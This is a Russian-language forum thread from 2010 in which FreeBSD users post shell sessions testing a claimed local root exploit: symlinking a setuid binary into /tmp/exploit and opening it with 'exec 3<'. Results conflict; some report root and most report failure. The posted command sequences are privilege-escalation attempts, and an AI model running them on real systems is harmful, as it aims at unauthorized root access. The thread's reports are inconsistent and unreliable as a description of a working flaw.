Может замечали...

Обсуждение всяких разных новостей.
r00t
проходил мимо

Может замечали...

Непрочитанное сообщение r00t » 2010-10-19 19:44:23

Код: Выделить всё

[20:35 alex@darkstar /home/alex]% mkdir /tmp/exploit
[20:35 alex@darkstar /home/alex]% ln -s /sbin/mount_msdosfs /tmp/exploit/target
[20:36 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[20:36 root@darkstar /home/alex]# whoami
root
[20:37 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[20:37 root@darkstar /home/alex]# uname -a
FreeBSD darkstar.velko2000.local 8.0-RC2 FreeBSD 8.0-RC2 #0: Tue Jan 26 11:45:15 MSK 2010     alex@darkstar.domain.local:/usr/obj/usr/src/sys/NG_PF_KERNEL  i386
Вот это реальная жопа на самом деле. Первый достойный и простой локальный эксплоит за многие годы.

Источник: http://seclists.org/fulldisclosure/2010/Oct/257

Хостинговая компания Host-Food.ru
Хостинг HostFood.ru
 

Услуги хостинговой компании Host-Food.ru

Хостинг HostFood.ru

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35308
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Может замечали...

Непрочитанное сообщение Alex Keda » 2010-10-19 19:50:03

Код: Выделить всё

srv1$ sh -E
$ exec 3< /tmp/exploit/target
$ id
uid=1000(lissyara) gid=0(wheel) groups=0(wheel)
$
$ rm -rf /tmp/exploit
$ id
uid=1000(lissyara) gid=0(wheel) groups=0(wheel)
$ mkdir /tmp/exploit
$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ whoami
lissyara
$ uname -a
FreeBSD srv1.host-food.ru 8.1-RC2 FreeBSD 8.1-RC2 #0: Fri Jul 16 13:44:36 MSD 2010     lissyara@srv1.host-food.ru:/home/usr_moved/obj/home/usr_moved/src/sys/HOST-FOOD  i386
$       
в tcsh выкидывает из ssh на

Код: Выделить всё

exec 3< /tmp/exploit/target
Убей их всех! Бог потом рассортирует...

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35308
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Может замечали...

Непрочитанное сообщение Alex Keda » 2010-10-19 19:59:09

Код: Выделить всё

srv1$ bash
[lissyara@srv1 ~]$ exec 3 < /tmp/exploit/target
bash: exec: 3: не найден
[lissyara@srv1 ~]$ exit
srv1$
Убей их всех! Бог потом рассортирует...

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35308
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Может замечали...

Непрочитанное сообщение Alex Keda » 2010-10-19 20:04:28

это не та ли бага с ld.so которую летом ли весной фиксили?
Убей их всех! Бог потом рассортирует...

r00t
проходил мимо

Re: Может замечали...

Непрочитанное сообщение r00t » 2010-10-19 20:06:11

Код: Выделить всё

[21:11 alex@darkstar /home/alex]% id
uid=1001(alex) gid=1001(alex) groups=1001(alex),0(wheel)
[21:11 alex@darkstar /home/alex]% mkdir -p /tmp/exploit
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: File exists
[21:11 alex@darkstar /home/alex]% rm /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[21:12 root@darkstar /home/alex]# echo $SHELL
/bin/csh
[21:12 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

[/code]

r00t
проходил мимо

Re: Может замечали...

Непрочитанное сообщение r00t » 2010-10-19 20:08:02

Код: Выделить всё

[21:11 alex@darkstar /home/alex]% id
uid=1001(alex) gid=1001(alex) groups=1001(alex),0(wheel)
[21:11 alex@darkstar /home/alex]% mkdir -p /tmp/exploit
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: File exists
[21:11 alex@darkstar /home/alex]% rm /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% ln -s /sbin/ping /tmp/exploit/target
[21:11 alex@darkstar /home/alex]% exec 3< /tmp/exploit/target
3: Command not found.
[21:12 root@darkstar /home/alex]# echo $SHELL
/bin/csh
[21:12 root@darkstar /home/alex]# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
[/code]

Нет, это что-то новое. в csh попробуй ))

Аватара пользователя
hizel
дядя поня
Сообщения: 9032
Зарегистрирован: 2007-06-29 10:05:02
Откуда: Выборг

Re: Может замечали...

Непрочитанное сообщение hizel » 2010-10-19 20:46:20

В дурацкие игры он не играет. Он просто жуткий, чу-чу, паровозик, и зовут его Блейн. Блейн --- это Боль.

Аватара пользователя
FreeBSP
майор
Сообщения: 2020
Зарегистрирован: 2009-05-24 20:20:19
Откуда: Москва

Re: Может замечали...

Непрочитанное сообщение FreeBSP » 2010-10-19 22:58:39

Код: Выделить всё

[@~]$ mkdir -p /tmp/exploit
[@~]$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
[@~]$ exec 3< /tmp/exploit/target
[@~]$ id -u
1001
[@~]$ uname -mrs
7.2-RELEASE-p8 i386
[@~]$ rm -rf /tmp/exploit
[@~]$
тенех вылетает на exec. может оно ломается, но ломается неправильно?
Человек начинает получать первые наслаждения от знакомства с unix системами. Ему нужно помочь - дальше он сможет получать наслаждение самостоятельно ©
Ламер — не желающий самостоятельно разбираться. Не путать с новичком: ламер опасен и знает это!

Аватара пользователя
Alex Keda
стреляли...
Сообщения: 35308
Зарегистрирован: 2004-10-18 14:25:19
Откуда: Made in USSR
Контактная информация:

Re: Может замечали...

Непрочитанное сообщение Alex Keda » 2010-10-19 23:04:00

фиксили в ld.so именно такой момент.
и именно выход был сделан на попытку повысить привелегии

искать лень. тут же где-то тема
Убей их всех! Бог потом рассортирует...

Аватара пользователя
schizoid
подполковник
Сообщения: 3228
Зарегистрирован: 2007-03-03 17:32:31
Откуда: Украина, Чернигов
Контактная информация:

Re: Может замечали...

Непрочитанное сообщение schizoid » 2010-10-20 9:41:16

шота у меня не работает... Фря 7.1-RELEASE-p11 и 6.3-RELEASE-p13
ядерный взрыв...смертельно красиво...жаль, что не вечно...

Аватара пользователя
terminus
майор
Сообщения: 2305
Зарегистрирован: 2007-10-29 11:27:35
Откуда: Рига

Re: Может замечали...

Непрочитанное сообщение terminus » 2010-10-20 9:46:52

Так это же линуксовая фигня! Читайте опеннет - там бурление говен среди линуксойдов и требования отставки столмана в связи с утратой доверия к libc.
Да и вон у топикстартера хостнейм darkstar - слекварщиг вестимо...
:ROFL:
Модель: AST-PM-105/0044; Тип: Универсальный, ремонтный; Название: Терминус; Род повреждения: Распад функций; Выводы: Сдать на слом.

Гость
проходил мимо

Re: Может замечали...

Непрочитанное сообщение Гость » 2010-10-20 9:59:29

Код: Выделить всё

$ mkdir -p /tmp/exploit
$ ln -s /sbin/mount_msdosfs /tmp/exploit/target
$ exec 3< /tmp/exploit/target
$ id -u
1001
$ uname -psr
FreeBSD 6.4-RELEASE-p6 i386
$ whereis bash
bash: /usr/ports/shells/bash
$ csh
% exec 3< /tmp/exploit/target
3: Command not found.
После этого вылетел из SSH-сессии. Захожу заново, шелл по умолчанию - csh

Код: Выделить всё

% exec 3< /tmp/exploit/target
3: Command not found.
# id -u
0

Аватара пользователя
hedgehog
сержант
Сообщения: 220
Зарегистрирован: 2010-01-26 11:47:05
Откуда: Kharkiv, Ukraine
Контактная информация:

Re: Может замечали...

Непрочитанное сообщение hedgehog » 2010-10-20 10:05:47

freebsd 8.1 amd64, zfs. пробую на виртуалке - не выходит. после exec просто вываливаюсь из текущего шелла. пробовал включать setuid для /tmp. обновись, а?

кстати, судя по опеннету надо создавать хардлинк, монтировать /proc и еще чего-то крутить.

Код: Выделить всё

$ ln /sbin/ping /tmp/exploit/target
ln: /tmp/exploit/target: Cross-device link
привет монтирующим только / ?